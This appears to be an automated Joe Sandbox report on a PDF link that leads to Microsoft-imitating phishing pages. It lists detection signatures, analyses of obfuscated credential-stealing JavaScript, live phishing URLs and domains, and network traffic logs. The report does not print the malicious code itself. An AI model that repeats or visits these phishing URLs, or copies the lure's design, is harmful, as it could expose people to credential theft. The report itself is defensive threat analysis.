Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440

Overview

General Information

Sample URL:https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440
Analysis ID:1586262

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish54
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1928,i,18385623245875706424,1655197702028866165,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
2.15.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    7.13.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      2.21.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        8.14.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          8.15.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            Click to see the 2 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            Phishing

            barindex
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=NextJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'jackoffjackofflilliilkillxoopoeadonline.top' does not match the legitimate domain for Microsoft., The URL contains suspicious elements such as random words and an unusual domain extension '.top'., The URL does not have any recognizable association with Microsoft., The presence of an input field asking for an email is common in phishing attempts to harvest credentials. DOM: 5.8.pages.csv
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'login.pguhmxcggroup.top' does not match the legitimate domain., The URL contains unusual elements such as 'pguhmxcggroup' and uses a '.top' domain extension, which is uncommon for Microsoft., The presence of 'login' in the subdomain is a common tactic used in phishing to mimic login pages. DOM: 8.17.pages.csv
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'login.pguhmxcggroup.top' does not match the legitimate domain., The URL contains unusual elements such as 'pguhmxcggroup' which do not relate to Microsoft., The domain extension '.top' is uncommon for a well-known brand like Microsoft., The presence of 'login' in the subdomain is a common tactic used in phishing to mimic login pages. DOM: 8.18.pages.csv
            Source: Yara matchFile source: 2.15.id.script.csv, type: HTML
            Source: Yara matchFile source: 7.13.pages.csv, type: HTML
            Source: Yara matchFile source: 2.21.id.script.csv, type: HTML
            Source: Yara matchFile source: 8.14.pages.csv, type: HTML
            Source: Yara matchFile source: 8.15.pages.csv, type: HTML
            Source: Yara matchFile source: 8.17.pages.csv, type: HTML
            Source: Yara matchFile source: 8.19.pages.csv, type: HTML
            Source: file:///C:/Users/user/Downloads/downloaded.pdfJoe Sandbox AI: Page contains button: 'View Document' Source: '1.1.pages.csv'
            Source: file:///C:/Users/user/Downloads/downloaded.pdfJoe Sandbox AI: Page contains button: 'View Document' Source: '1.2.pages.csv'
            Source: 2.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://jackoffjackofflilliilkillxoopoeadonline.to... The provided JavaScript snippet exhibits several high-risk behaviors, including the use of obfuscated code, data exfiltration, and redirects to a suspicious domain. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators.
            Source: 2.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://jackoffjackofflilliilkillxoopoeadonline.to... This script exhibits several high-risk behaviors, including data exfiltration, obfuscated code, and redirects to potentially malicious domains. The script appears to be collecting sensitive user information and sending it to an external server, which is a clear indication of malicious intent. Additionally, the use of heavily obfuscated code and the presence of suspicious domain interactions further increase the risk score. Overall, this script demonstrates a high level of risk and should be treated with caution.
            Source: 2.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://jackoffjackofflilliilkillxoopoeadonline.to... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script from an unknown source, along with the obfuscated nature of the code, suggests this is a highly suspicious and potentially malicious script.
            Source: 2.10.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://jackoffjackofflilliilkillxoopoeadonline.to... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It appears to be collecting user email and password information and sending it to an external domain, which is a strong indicator of malicious intent. The script also attempts to redirect the user to a suspicious domain, further increasing the risk. While some contextual factors, such as the use of a legitimate-looking domain, may suggest a potential legitimate purpose, the overall behavior of the script is highly suspicious and warrants further investigation.
            Source: 2.11.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://iyd4h7bj22.xbslqfequn.workers.dev/?caa3fd=... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the script may have a legitimate purpose, the overall behavior is highly suspicious and requires further investigation.
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=NextHTTP Parser: Number of links: 0
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.comHTTP Parser: Number of links: 0
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: Number of links: 0
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=NextHTTP Parser: <input type="password" .../> found but no <form action="...
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=NextHTTP Parser: Total embedded image size: 23644
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/driveHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=NextHTTP Parser: Title: Shared does not match URL
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.comHTTP Parser: Title: Log In does not match URL
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: Title: Log In does not match URL
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=NextHTTP Parser: Invalid link: Privacy & Cookies
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: Iframe src: https://portal.pguhmxcggroup.top/Prefetch/Prefetch.aspx
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: Iframe src: https://portal.pguhmxcggroup.top/Prefetch/Prefetch.aspx
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: Iframe src: https://portal.pguhmxcggroup.top/Prefetch/Prefetch.aspx
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=NextHTTP Parser: <input type="password" .../> found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: <input type="password" .../> found
            Source: https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440HTTP Parser: No favicon
            Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
            Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/driveHTTP Parser: No favicon
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/driveHTTP Parser: No favicon
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/driveHTTP Parser: No favicon
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=NextHTTP Parser: No favicon
            Source: https://login.pguhmxcggroup.top/?B662gO8CW0E=aHR0cHM6Ly9vZmZpY2UuY29t&omn=bXN0ZXN0QGRvbWFpbi5jb20=HTTP Parser: No favicon
            Source: https://login.pguhmxcggroup.top/?B662gO8CW0E=aHR0cHM6Ly9vZmZpY2UuY29t&omn=bXN0ZXN0QGRvbWFpbi5jb20=HTTP Parser: No favicon
            Source: https://login.pguhmxcggroup.top/?B662gO8CW0E=aHR0cHM6Ly9vZmZpY2UuY29t&omn=bXN0ZXN0QGRvbWFpbi5jb20=HTTP Parser: No favicon
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.comHTTP Parser: No favicon
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No favicon
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No favicon
            Source: https://login.live.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.pguhmxcggroup.top%2fcommon%2ffederation%2foauth2msa&state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuATmnA_deEXsrO-29kc-_kX-vLMYOeNzMsvAKlcxKhM2Tv8CI-MLRsZJTIK5xSWpxSUOKfm5iZl5IKlbTIL-RemeKeHFbqkpqUWJJZn5eY-YMdVdYBF4xcJjwGzFwcElwCDBoMDwg4VxESvQdRFcb0py_q1w2NfCLaBxmYHhFKt-mbenW3JZQKSTl3GFX2qxi1-OT0SlYUZYUoF2lKlrVZR3Un5VakWihYmRha2lleEENqEJbEyn2Bg-sDF2sDPMYmc4wMm4gYfxAC_DD76rc9fdO9J65p3HK36dMLOSjAAD45IQx-Ds0pzk4ICw3My0snT9MPfcCD-DYu9AD-_k4ih3L0sDV9sNAgwPBBgA0&estsfed=1&uaid=b155cf9c16d44dcdb687e24c4f724f0d&fci=https%3a%2f%2fportal.pguhmxcggroup.top.orgid.com&username=mstest%40gmail.com&login_hint=mstest%40gmail.comHTTP Parser: No favicon
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=NextHTTP Parser: No <meta name="author".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.comHTTP Parser: No <meta name="author".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=NextHTTP Parser: No <meta name="copyright".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.comHTTP Parser: No <meta name="copyright".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
            Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49765 version: TLS 1.2
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: global trafficDNS traffic detected: DNS query: ik.imagekit.io
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: jackoffjackofflilliilkillxoopoeadonline.top
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: login.pguhmxcggroup.top
            Source: global trafficDNS traffic detected: DNS query: iyd4h7bj22.xbslqfequn.workers.dev
            Source: global trafficDNS traffic detected: DNS query: newnewdomnewbjbfcjfidd.pguhmxcggroup.top
            Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
            Source: global trafficDNS traffic detected: DNS query: newnewdomnewdefijbfjhi.pguhmxcggroup.top
            Source: global trafficDNS traffic detected: DNS query: portal.pguhmxcggroup.top
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
